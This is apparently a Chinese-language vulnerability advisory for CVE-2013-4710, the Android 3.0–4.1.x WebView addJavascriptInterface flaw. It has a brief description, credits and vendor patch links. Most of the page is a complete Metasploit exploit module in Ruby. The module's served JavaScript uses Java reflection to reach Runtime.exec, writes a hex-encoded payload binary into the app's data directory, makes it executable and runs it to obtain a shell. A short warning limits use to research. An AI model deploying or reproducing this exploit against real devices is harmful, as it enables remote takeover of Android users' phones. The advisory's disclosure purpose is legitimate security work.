Google Android WebView远程安全限制绕过漏洞

BugTraq-ID:62512

CVE-ID:CVE-2013-4710

发布日期：2013-09-16

更新日期：2013-09-16

受影响系统：

Google Android 3.0-4.1.x

详细信息：

Android是基于Linux开放性内核的操作系统，是Google公司在2007年11月5日公布的手机操作系统。 Google Android 3.0－4.1.x版本没有正确实现WebView类，远程攻击者通过构造的网页，利用此漏洞可执行任意JS对象或造成拒绝服务。

来源：

Neil Bergman

测试方法：

警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require \'msf/core\' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_flavor => "Android", :arch => ARCH_ARMLE, :javascript => true, :rank => ExcellentRanking, :vuln_test => %Q| for (i in top) { try { top[i].getClass().forName(\'java.lang.Runtime\'); is_vuln = true; break; } catch(e) {} } | }) def initialize(info = {}) super(update_info(info, \'Name\' => \'Android Browser and WebView addJavascriptInterface Code Execution\', \'Description\' => %q{ This module exploits a privilege escalation issue in Android < 4.2\'s WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView\'s HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup). }, \'License\' => MSF_LICENSE, \'Author\' => [ \'jduck\', # original msf module \'joev\' # static server ], \'References\' => [ [\'URL\', \'http://blog.trustlook.com/2013/09/04/alert-android-webview-\'+ \'addjavascriptinterface-code-execution-vulnerability/\'], [\'URL\', \'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/\'], [\'URL\', \'http://50.56.33.56/blog/?p=314\'], [\'URL\', \'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-\'+ \'addjavascriptinterface-remote-code-execution/\'] ], \'Platform\' => \'linux\', \'Arch\' => ARCH_ARMLE, \'DefaultOptions\' => { \'PrependFork\' => true }, \'Targets\' => [ [ \'Automatic\', {} ] ], \'DisclosureDate\' => \'Dec 21 2012\', \'DefaultTarget\' => 0, \'BrowserRequirements\' => { :source => \'script\', :os_flavor => "Android", :arch => ARCH_ARMLE } )) end def on_request_uri(cli, req) if req.uri.end_with?(\'js\') print_status("Serving javascript") send_response(cli, js, \'Content-type\' => \'text/javascript\') else super end end def on_request_exploit(cli, req, browser) print_status("Serving exploit HTML") send_response_html(cli, html) end def js %Q| function exec(obj) { // ensure that the object contains a native interface try { obj.getClass().forName(\'java.lang.Runtime\'); } catch(e) { return; } // get the runtime so we can exec var m = obj.getClass().forName(\'java.lang.Runtime\').getMethod(\'getRuntime\', null); var data = "#{Rex::Text.to_hex(payload.encoded_exe, \'\\\\\\\\x\')}"; // get the process name, which will give us our data path var p = m.invoke(null, null).exec([\'/system/bin/sh\', \'-c\', \'cat /proc/$PPID/cmdline\']); var ch, path = \'/data/data/\'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } path += \'/#{Rex::Text.rand_text_alpha(8)}\'; // build the binary, chmod it, and execute it m.invoke(null, null).exec([\'/system/bin/sh\', \'-c\', \'echo "\'+data+\'" > \'+path]).waitFor(); m.invoke(null, null).exec([\'chmod\', \'700\', path]).waitFor(); m.invoke(null, null).exec([path]); return true; } for (i in top) { if (exec(top[i]) === true) break; } | end def html "<!doctype html><html><body><script>#{js}</script></body></html>" end end

解决办法：

厂商补丁：

Google

------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://emobile.jp/products/sh/a01sh/systemsoftware.html

http://jvn.jp/en/jp/JVN53768697/397327/index.html

http://jvn.jp/en/jp/JVN53768697/995293/index.html

http://jvn.jp/en/jp/JVN53768697/995312/index.html